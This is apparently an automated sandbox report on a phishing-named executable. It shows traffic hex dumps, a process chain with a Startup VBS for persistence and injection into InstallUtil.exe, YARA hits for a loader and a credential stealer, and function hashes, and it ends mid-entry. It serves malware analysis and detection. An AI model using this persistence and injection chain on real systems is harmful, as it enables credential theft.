2025-01-03 01:01:21 UTC	8000	IN	Data Raw: 0e 8d f6 28 f2 64 49 4f 3c 88 2f 45 4b f2 dc 9b 4f 8c bc 5c ac c5 96 b7 5e 29 ad 5b 87 f7 31 e0 d6 a0 4a 23 e7 2a 3b ae d7 86 6e 4d be f1 09 8c 3c f7 be ac dd cc f6 b5 3b 59 fc ba ea 20 8a a5 8e 37 aa 49 da 95 6a e8 2d c5 d2 0a fc 61 62 f4 d2 c6 9b e6 89 2a a0 fc 51 aa cc 80 9b ce e4 15 2f c7 2b 0f c8 ce 8a 3c 41 d0 ed 47 59 3a 58 89 49 d7 05 83 35 bc 7b 61 bf e9 b1 88 6b d7 c5 c2 18 5d 70 c3 51 5a 49 05 9c e1 5d 43 c2 6e 4a d0 6c 1a e9 da e1 44 2e 8f cd 53 c5 f8 5a c8 48 e7 10 e3 68 43 ce 7c 0b 51 0e 56 5c d3 2c 87 7b a7 c0 b5 dd b9 a2 8f ce 7f bf 11 10 fd 7a 01 d6 04 01 d2 c5 03 27 12 32 03 72 3a 6e cf 8d a1 1f 44 b8 42 60 9e 69 84 ab ed f3 f4 89 18 9f e9 b9 4c 63 43 10 cb 10 73 18 41 c1 94 19 04 8c 05 34 bd b2 4a 3a 5a a0 c0 07 20 16 20 cb 66 de d0 78 Data Ascii: (dIO</EKO\^)[1J#;nM<;Y 7Ij-abQ/+<AGY:XI5{ak]pQZI]CnJlD.SZHhC\|QV\,{z'2r:nDB`iLcCsA4J:Z fx
2025-01-03 01:01:21 UTC	8000	IN	Data Raw: 21 4d 2d ea 1f 87 b9 54 b6 3c 26 8d 02 15 9d 0a 83 b7 27 93 09 d5 ec 58 1a a2 08 56 e1 94 31 f3 d9 58 3b 55 2f b6 d3 25 e9 84 da 5d 37 a5 e8 e9 5f 34 a1 49 e9 de 14 dc d1 3a 32 ee d5 79 62 23 eb 2b 1b 7e 84 1d ab 73 22 0a e2 a7 2b 44 5e 20 0d 08 81 16 df fe c0 cd 1d 0c 78 28 d1 a3 83 27 4d 2d 49 9d 71 91 00 ad e2 a7 0b c6 61 7e e9 17 f2 77 4f 92 57 34 18 09 d4 27 48 27 94 af 95 8b d4 03 f1 99 96 9c a3 0c b1 67 60 74 89 a9 65 1f 90 51 79 0e c6 48 1f 8c 4b 87 0c 67 ff ff 6d 18 e3 e5 3b c8 f9 0c 1a 65 ea 8e b5 92 66 87 d9 58 94 70 54 74 6d b9 44 d9 4d 13 80 9a 47 88 5e dc 86 e7 a5 76 b3 48 ba 94 54 82 7a 63 67 43 6e 3c 7b f8 27 3e 3d 35 d4 27 c6 eb 83 f0 d7 2a dd 02 f5 af 9c 2e 6e c4 db 8f 4f 49 e9 8c 07 39 76 0c 81 2c 5a 6e 95 95 d4 30 2a e3 3f eb 40 ad e8 Data Ascii: !M-T<&'XV1X;U/%]7_4I:2yb#+~s"+D^ x('M-Iqa~wOW4'H'g`teQyHKgm;efXpTtmDMG^vHTzcgCn<{'>=5'.nOI9v,Zn0?@
2025-01-03 01:01:21 UTC	8000	IN	Data Raw: 5f 2d c6 9c 24 54 3d d2 29 13 48 1f 83 e6 3f 03 03 f0 dc 6f 04 81 c5 86 f4 9e a3 11 f5 6f d8 22 6d b2 0d cd fb b6 0a 0c 7b 7a 38 77 5b 21 0e 43 35 ad dd f5 be 47 4a 33 49 9a a8 16 8e e5 38 13 97 78 da a7 76 d2 de 25 7c db 71 b2 e5 d2 5e a0 ff be 38 a4 82 7e aa 76 7d df 2f f7 e4 c1 8a f8 20 78 a2 f2 0e 26 11 c7 82 42 d5 47 a7 5f 86 b2 f4 de ac 0a 26 d3 a2 73 33 bf f1 2f 06 f2 f5 68 b0 64 96 5d 34 5c 03 8d be 59 1b 89 74 11 e8 4d f5 10 5a 57 9a 03 bc f5 b8 27 b6 51 99 b3 f6 f4 e9 5b f6 f0 c4 12 f0 7e b8 83 6d 63 0a 52 80 40 cd 43 1e 05 0b 13 24 e9 f4 7d 7e 00 0d 0b c1 be 85 37 ba 13 39 8f c0 d2 76 80 f9 ac 37 1d d1 44 05 37 7a 96 98 49 9d e3 b2 83 59 d7 30 fc 1c 95 df d5 92 e3 a9 d2 74 c0 02 ca 85 b3 04 db b3 b0 7c 65 83 90 aa ba 7a 01 99 a5 ca 0e 05 e9 07 Data Ascii: _-$T=)H?oo"m{z8w[!C5GJ3I8xv%\|q^8~v}/ x&BG_&s3/hd]4\YtMZW'Q[~mcR@C$}~79v7D7zIY0t\|ez
2025-01-03 01:01:21 UTC	8000	IN	Data Raw: 69 fc d7 4d 05 10 7f 07 ee 4c 38 e9 a9 4a 9b 14 e1 7d 2c df 77 3b 27 7e 2b 2f 44 c5 68 8b da d1 95 44 fd 40 28 d0 93 e0 ef 76 67 62 3a cd f1 55 0a 61 46 6c 7d 3f 37 e8 64 41 f8 5b 42 be 9f 0d 6e 1f 5d 84 2a 65 d1 d8 8c 85 21 e9 d8 eb 7a b7 bd de 6f 04 a3 ad 76 62 3b 55 21 7d e7 f4 6b 22 35 cc b1 d1 1f 4a 94 cc 33 2d 1a a3 5e 0e b0 70 d4 82 2f fe 8f a7 a0 04 30 3c e4 47 ea 59 9b 91 2e eb ce 22 54 ee 93 d5 43 38 a0 de b2 d0 79 52 be cb a7 b7 59 d1 2c 47 00 3f fe 2c d9 b2 c5 62 33 b8 63 c2 9d 32 f3 0c eb 99 a6 0b d6 ab 56 66 18 54 6f 53 c2 27 73 c0 36 c8 25 9a a7 d4 39 48 5c 4b b1 0e 1d 24 84 ef db f7 35 8a f2 ef 8a a9 4c 2d a8 09 d6 32 10 61 6d 53 14 9d e8 98 16 30 6a f7 36 e2 e0 b1 1e 47 0d f8 42 bf ae 1f 9c ec f8 ee 43 fd 26 9a 04 f2 a4 fb 1c 3d 7f 92 28 Data Ascii: iML8J},w;'~+/DhD@(vgb:UaFl}?7dA[Bn]*e!zovb;U!}k"5J3-^p/0<GY."TC8yRY,G?,b3c2VfToS's6%9H\K$5L-2amS0j6GBC&=(
2025-01-03 01:01:21 UTC	8000	IN	Data Raw: af 62 b5 07 93 0e 92 d9 94 b6 93 68 79 fa ab 5d 10 7a 21 80 6f b0 04 1f 38 d0 80 63 ce 64 1d ed f6 31 78 28 aa 69 f5 01 89 5e 6c ca e6 d5 b8 91 16 9c 13 b8 4d 6f 63 2c 68 e4 55 c8 c8 9b 40 8d 0a 28 25 37 ce 93 d6 eb 6b 5c 16 fc a8 eb be 6b f6 da 50 6d 6f b9 5a 88 cb 77 1f ea 4d 49 12 12 89 97 80 d6 cb e0 c5 c6 b5 54 55 45 01 13 45 6f 9b 8b 32 b6 3a 9b 2f d0 e9 23 3d fc eb 18 93 48 6d ad f3 21 b1 a7 c4 c5 43 00 c5 7f a2 62 13 3f 2f b1 e2 b5 d8 ec 39 5e 14 ed f0 f8 43 a3 65 fa 5e fa 86 05 55 1c ce 5c 36 57 f4 0b 0e 1a bb ea 31 6a 29 6f 81 4d ec cd a2 b5 aa 8d 30 9f 1e 16 98 a2 91 e0 11 48 0e ff ed bd f6 fb 14 21 65 b2 05 14 f5 3f 38 9c 1c 77 49 7e 43 69 36 d5 fa 46 e8 7c ef 87 9f 2a 48 97 11 fe 93 2c c7 31 8c 43 47 06 4f 4b 2d 2b cd 53 a5 52 88 a1 d6 83 ea Data Ascii: bhy]z!o8cd1x(i^lMoc,hU@(%7k\kPmoZwMITUEEo2:/#=Hm!Cb?/9^Ce^U\6W1j)oM0H!e?8wI~Ci6F\|*H,1CGOK-+SR
2025-01-03 01:01:21 UTC	8000	IN	Data Raw: b9 6b e6 31 e8 9b 88 e5 ea 3c 03 62 d8 f1 e5 9f 77 c2 6d 47 f7 4c 12 63 c9 4a 07 19 21 d3 1e 48 09 9a 96 bb 58 74 aa 2c 76 72 ce 8c 8c 33 21 79 ba bf 7d cc 92 77 b1 8f dd d7 15 c1 3c 31 5f fc 90 9a 3d 4a 32 72 c9 6f 6d d3 40 c8 ad 34 69 ff 5d e6 60 79 4a 8e ee 59 90 7b 1c b5 2c 23 ba bf 29 87 b0 29 05 79 19 70 71 c7 1f e7 66 d4 b8 36 4e f8 cd 86 d3 c5 e3 19 77 a3 6d 9f aa fb cd 89 85 6c 9f cd 20 6b 83 9e 93 b3 04 a7 df 94 34 89 a2 33 92 93 6e 7c 0d fc 95 02 c0 4c 5e b2 69 c8 ef 5c 6b b7 c1 4b 8b aa e4 d4 aa 11 ad 4b f0 c0 72 e6 e0 b8 6d d2 d7 ca f3 15 e7 bc cf 03 39 09 1e 5a 4b 94 be 71 22 99 4a f6 90 6f 8b 10 b7 01 c5 69 2c ab a1 03 cc 29 18 d5 b9 99 33 a4 12 36 7d 47 a4 a7 96 43 9d 98 cf 70 bb c3 ea cb 51 ec 0a 67 e2 6b 32 b6 f0 0c 93 67 9a 86 c0 4f b5 Data Ascii: k1<bwmGLcJ!HXt,vr3!y}w<1_=J2rom@4i]`yJY{,#))ypqf6Nwml k43n\|L^i\kKKrm9ZKq"Joi,)36}GCpQgk2gO
2025-01-03 01:01:21 UTC	8000	IN	Data Raw: 60 25 52 7c 03 b1 78 52 56 47 d4 03 34 37 b9 be 6b 5f 32 54 69 33 e0 b4 f5 23 38 2b 7b 69 3d 7f 38 27 bb 18 74 eb 83 76 71 98 1a 9d 6a 2b 76 7a c4 7d df 1c 69 04 ad 29 09 38 62 fb f4 c2 65 d1 b1 48 4f d2 c5 fe aa 4f d1 a4 2d be e5 17 80 04 aa a9 46 65 f0 e0 12 f5 11 96 81 f3 d6 c2 46 d4 1d d0 e1 7e 41 c7 04 de 13 de 02 e4 86 b2 b8 30 74 e4 a8 6f 02 a7 b9 a4 62 c2 97 ba 58 de d0 a7 0c 23 09 6b 79 bc 21 55 28 e3 e9 bd 92 b3 58 ed ba a8 3e ec 38 00 c0 ca 84 60 b9 f6 c3 a7 6e 99 66 4a 50 aa 7a a8 ff 74 51 f4 af eb ff 71 e4 e8 86 05 c0 3d c0 c3 8a ea 52 c1 00 a9 0c f5 34 ff 66 e6 c9 51 5a ec 8f 2a 32 4b 15 a5 b7 75 d6 a8 25 1e 26 a5 7c ea b7 28 e5 5e c2 fc 4b 5c 64 ae 8f ec cb aa 7f 8d f6 2f f8 fe 16 f0 bd d4 4e 5b d7 52 e9 a4 d9 31 89 ba 73 57 c9 57 ce 40 5e Data Ascii: `%R\|xRVG47k_2Ti3#8+{i=8'tvqj+vz}i)8beHOO-FeF~A0tobX#ky!U(X>8`nfJPztQq=R4fQZ*2Ku%&\|(^K\d/N[R1sWW@^
2025-01-03 01:01:21 UTC	8000	IN	Data Raw: 09 b1 b2 75 fe a4 e7 cd e0 79 ca 67 45 84 b6 80 0b c8 c0 73 00 76 2d 45 d5 c5 c5 7b b0 22 81 20 58 e0 50 9e a3 1a c8 bd 15 f2 07 3e d1 13 72 7d a2 53 3f cf db 92 7c fc fc ac ad d7 4c f3 5e d0 61 7a 0b 84 20 a9 84 87 00 ab 25 17 40 0d cf e0 ab 74 35 b8 04 61 67 db b9 25 a8 49 1f bb 4c e2 84 78 57 3a 04 71 bf fe 83 e4 b4 6f b4 a8 6a 87 1a 8e d7 67 a3 55 f8 a2 16 0b d7 9d 08 04 14 ee 34 7e 6f f1 d7 b2 f3 32 20 1f 28 79 b1 2f e5 d2 21 70 08 77 a3 d1 e9 3d 39 fa 38 a7 dd ed f3 bf d8 cb d7 af e1 35 d6 40 12 98 53 96 38 b3 ab 4d 2f 50 03 33 d1 c5 8c 84 20 6c f7 dc 42 4e 68 c5 00 d4 ba fc bd fd 0b 8d 7a a5 64 37 4a ff 64 f1 08 e7 d8 11 de 36 f4 69 b5 f8 6f 4d 46 6d c9 44 a7 ed 5d 98 2b dc ee a7 cd b2 cf 00 03 d1 74 d5 a3 67 29 2d 3b fe 6e 1b 4c 96 59 6e 23 2f be Data Ascii: uygEsv-E{" XP>r}S?\|L^az %@t5ag%ILxW:qojgU4~o2 (y/!pw=985@S8M/P3 lBNhzd7Jd6ioMFmD]+tg)-;nLYn#/
2025-01-03 01:01:21 UTC	8000	IN	Data Raw: 86 ad 83 41 2f b3 ed 44 55 54 6a 9d 8d 2b 55 27 ee da c4 e1 81 3e dd 84 8c e2 61 ae 66 75 7a 9b 7f 06 b2 63 34 a0 b7 07 5e 2a ab 89 8a b1 57 3a fb 7d 67 e1 3f 11 e2 78 c6 28 b8 9f 37 a7 e8 15 6a b5 e9 59 33 60 e0 c3 24 a3 46 7d cc cf c2 18 e5 c1 75 ce b0 98 87 51 94 2d 66 63 76 86 dc 52 b0 82 7e 76 f0 14 84 bb 9a e0 45 ca 8d e5 15 a9 01 f5 9e dd ac b4 c8 88 8f 43 2e ce ee 67 7b 75 d0 76 f6 d1 95 c0 38 74 2e ad 64 34 ba 37 91 1d a3 17 0e f1 dd 79 f1 f5 ff 7e 78 7d 39 b1 a1 b2 18 8c d5 e3 17 94 96 c6 c3 24 4c 38 fa fc 8d 10 2b be 34 83 3b dd 36 1b 06 1c 5a a1 a4 d0 f1 a1 77 c7 85 5a 4b 30 6e 55 8b 59 fb 03 1b 25 a7 1c 2d 17 d6 5c 06 55 e0 f4 e7 f4 c8 3b 0d 92 28 dd 8f 0c e8 8e 09 87 42 50 61 27 6c 03 0e 4f f3 25 51 78 60 44 b8 0b 50 83 2b 9d 79 7b 7c 3b 22 Data Ascii: A/DUTj+U'>afuzc4^*W:}g?x(7jY3`$F}uQ-fcvR~vEC.g{uv8t.d47y~x}9$L8+4;6ZwZK0nUY%-\U;(BPa'lO%Qx`DP+y{\|;"

Target ID:	0
Start time:	20:00:57
Start date:	02/01/2025
Path:	C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe"
Imagebase:	0xb90000
File size:	25'600 bytes
MD5 hash:	07A7551DA7299874AFD2C3E299ECA83A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.390292373562.000000000300C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.390311703554.0000000006CC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.390302174360.0000000003FC8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	20:01:10
Start date:	02/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x6b0000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.391408013496.0000000002BCF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	20:01:19
Start date:	02/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs"
Imagebase:	0x7ff734ee0000
File size:	170'496 bytes
MD5 hash:	0639B0A6F69B3265C1E42227D650B7D1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	20:01:19
Start date:	02/01/2025
Path:	C:\Users\user\AppData\Roaming\Count.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Count.exe"
Imagebase:	0x7ff707cd0000
File size:	25'600 bytes
MD5 hash:	07A7551DA7299874AFD2C3E299ECA83A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.390523023200.00000000041B7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.390504748872.0000000002ACC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 26%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	20:01:31
Start date:	02/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0x580000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.390659379194.00000000029B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.2%
Total number of Nodes:	405
Total number of Limit Nodes:	10

Executed Functions

Function 06B57471 Relevance: 2.6, Strings: 1, Instructions: 1336
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

2, xrefs: 06B58456

Memory Dump Source

Source File: 00000000.00000002.390310829845.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b50000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: 2
API String ID: 0-450215437
Opcode ID: 4c7a8930ce3f8a5c0903979b8d2d941fb466cee6c99336d3ac586eca0f9003e5
Instruction ID: 027f63443ed47c615c95e2c5cc5111c3b200644d1d28df87aae11d2df0b413da
Opcode Fuzzy Hash: 4c7a8930ce3f8a5c0903979b8d2d941fb466cee6c99336d3ac586eca0f9003e5
Instruction Fuzzy Hash: 94E2E4B4E012288FDBA4DF69D994B9EB7B6FB89300F1181E9D509A7394DB305E81CF50

Function 06C34610 Relevance: 2.4, Strings: 1, Instructions: 1138COMMON

Download Yara Rule

Strings

4, xrefs: 06C34FF5

Memory Dump Source

Source File: 00000000.00000002.390311568260.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c30000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: 81b5a91f2fddf2b04797b0a1ad00ffde5dedf055129ca2a6d035d243887a6c03
Instruction ID: 49d1f17aad397ba7d273d9e677daf386adfc4047d74324c0ac958868093ce0b8
Opcode Fuzzy Hash: 81b5a91f2fddf2b04797b0a1ad00ffde5dedf055129ca2a6d035d243887a6c03
Instruction Fuzzy Hash: 5CB2F434A00228DFDB58DFA4D994BADB7B6FF88700F158199E505AB3A5CB70AD81CF50

Function 06E40040 Relevance: 1.9, Strings: 1, Instructions: 616
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8, xrefs: 06E4014A

Memory Dump Source

Source File: 00000000.00000002.390312647521.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: 5468874afbd930649407072ebb26ba78230e174ecf0263a1af19559e9d8de458
Instruction ID: 4d6767cd458f8acd8d1ce11dfd01eed4b44f6e5a5427e6632bc521291caa761c
Opcode Fuzzy Hash: 5468874afbd930649407072ebb26ba78230e174ecf0263a1af19559e9d8de458
Instruction Fuzzy Hash: 6E52D775E002298FDBA4DF69C990AD9B7B1FF89300F1485EAD909A7355DB30AE81CF50

Function 06C34947 Relevance: 1.7, Strings: 1, Instructions: 495COMMON

Download Yara Rule

Strings

4, xrefs: 06C34FF5

Memory Dump Source

Source File: 00000000.00000002.390311568260.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c30000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: f799039ceafc208ffe818a0e188456f9a164f89105f4e928566d27000763422a
Instruction ID: 79bd64bd337eaa0583e4d78bb079b63dae3152bc3a31c51a278c3494bf2244fb
Opcode Fuzzy Hash: f799039ceafc208ffe818a0e188456f9a164f89105f4e928566d27000763422a
Instruction Fuzzy Hash: 9F22F974A00228CFDB68DF65C994BADB7B2FF88300F1581A9D509AB3A5DB719D81CF50

Function 06E43890 Relevance: 1.6, APIs: 1, Instructions: 65
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06E43921

Memory Dump Source

Source File: 00000000.00000002.390312647521.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 4aedbeea422cf1a6a1c36a408aa30cbd3a7d01aed2f7632bb6ca95a92d2024b0
Instruction ID: ce315b6e9659535fa167c8e58de84ce24c8e493383b7eec32d701f24ee06afb8
Opcode Fuzzy Hash: 4aedbeea422cf1a6a1c36a408aa30cbd3a7d01aed2f7632bb6ca95a92d2024b0
Instruction Fuzzy Hash: 502122B0D003499FDB10DFAAD980BDEFBF0BB48314F20842AE959A3250C7759914CFA0

Function 06E43898 Relevance: 1.6, APIs: 1, Instructions: 63
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06E43921

Memory Dump Source

Source File: 00000000.00000002.390312647521.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 178de1489d6031a0a8f05a0071fc58d310e9df4a68d2c11a2202c1ddb3c78c34
Instruction ID: 7c74d1324296b8fdce42bcae2d9853970d4fc27f3bdb9c7c1068d733a435d70d
Opcode Fuzzy Hash: 178de1489d6031a0a8f05a0071fc58d310e9df4a68d2c11a2202c1ddb3c78c34
Instruction Fuzzy Hash: 0A21D2B5D013499FDB10DFAAD884AEEFBF5FF48310F60842AE519A7240C7759914CBA1

Function 06E46B00 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 06E46B6E

Memory Dump Source

Source File: 00000000.00000002.390312647521.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 38889edf42c78d1a548a802f803b6acfdd6a674daa5b069e6a5a3a8761441a18
Instruction ID: e5ff65b34eba5ca52be378b20ba4b524f56a2491afa6020eb0da382d0dcd0129
Opcode Fuzzy Hash: 38889edf42c78d1a548a802f803b6acfdd6a674daa5b069e6a5a3a8761441a18
Instruction Fuzzy Hash: 3111E4B1D003498FDB10DFAAD484BAEFBF4AF88324F54842AD419A7240C778A945CFA5

Function 06E46AFB Relevance: 1.6, APIs: 1, Instructions: 53nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 06E46B6E

Memory Dump Source

Source File: 00000000.00000002.390312647521.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 916e4de471e694bfc710c071c3719a61edc5f3f8950f70ffc3df3adb7ff67347
Instruction ID: 3c0a18f69fcc882498bdb46ff88beae1946f4eeeea50068c59d481f6cf0abe40
Opcode Fuzzy Hash: 916e4de471e694bfc710c071c3719a61edc5f3f8950f70ffc3df3adb7ff67347
Instruction Fuzzy Hash: E11112B1D003498FDB10DFAAD885BEEFBF4AF48324F54882AD459A7240C77899458FA4

Function 06E40006 Relevance: 1.4, Strings: 1, Instructions: 188COMMON

Download Yara Rule

Strings

h, xrefs: 06E4013E

Memory Dump Source

Source File: 00000000.00000002.390312647521.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e40000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID: h
API String ID: 0-2439710439
Opcode ID: 20cee67a6dd89a91b74f80e893e49b3693a1721324646ae85243ca3649f1e510
Instruction ID: 06c73e09c86809a3db74ab5684e2286676e5357be8ce40d1c8ae7b383ade393e
Opcode Fuzzy Hash: 20cee67a6dd89a91b74f80e893e49b3693a1721324646ae85243ca3649f1e510
Instruction Fuzzy Hash: 39814831D042598FDBA5DF69C850BC9BBB2FF8A300F0482EAD549A7295DB305E85CF60

Function 06B550A8 Relevance: 1.0, Instructions: 983COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.390310829845.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b50000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f7cc1878caf714e8742d1eb131354ec740e0cd6f728bd28adcc0f72ec1f0381
Instruction ID: e3c547f1514414d574720885886aecc9adc9b5931e93d20e392de60245a93af5
Opcode Fuzzy Hash: 0f7cc1878caf714e8742d1eb131354ec740e0cd6f728bd28adcc0f72ec1f0381
Instruction Fuzzy Hash: EAA2A175A00228CFDB65CF69C984BD9BBB2FF89304F1581E9D509AB225DB319E81CF50

Function 06D94470 Relevance: .7, Instructions: 679COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.390312155751.0000000006D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d90000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca215d3523ede0afe730a219ebe25d477d385fc98610a8564a88fb7018710cd2
Instruction ID: 7b8c1daea20171de76e988674a2dc0d085b5dd1fdfe8d9cc4ebf933e008c4317
Opcode Fuzzy Hash: ca215d3523ede0afe730a219ebe25d477d385fc98610a8564a88fb7018710cd2
Instruction Fuzzy Hash: 7C428C70B012158FDB98DF68C59476EBBF2FF88304F248529D56AD7381DB30A916CBA4

Function 06B58DDB Relevance: .5, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.390310829845.0000000006B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b50000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9c00c5a152407a57cc6b891543bbd9c3e18ea9950cc39ec05cf738a9901daa2
Instruction ID: 73a4fc0d40a4c4620daf038e36699f18cfa5aa308d8904b75cdfa5a0b51cd1a5
Opcode Fuzzy Hash: d9c00c5a152407a57cc6b891543bbd9c3e18ea9950cc39ec05cf738a9901daa2
Instruction Fuzzy Hash: E252B5B4A00229CFDBA4DF28C984B9AB7B6FB89301F1181D9D94DA7355DB309E81CF54

Function 06C30023 Relevance: .5, Instructions: 481COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.390311568260.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c30000_RFQ-12202431_ACD_Group.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 669c1c12bb57653998c5e825d7bb7a3018e81b878bd6268851c3ebfd0b47f4ae
Instruction ID: 2c15ac5d466608b4a3d2742510dfe32cdfbf61c6f288da4c2329edf229c9a1af
Opcode Fuzzy Hash: 669c1c12bb57653998c5e825d7bb7a3018e81b878bd6268851c3ebfd0b47f4ae
Instruction Fuzzy Hash: 40222770A45228CFDBA4DF69D984BEAB7F2FB89300F1480A9D509A7395DB305E81CF51

Function 06C30040 Relevance: .5, Instructions: 460COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.390311568260.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c30000_RFQ-12202431_ACD_Group.jbxd

Similarity

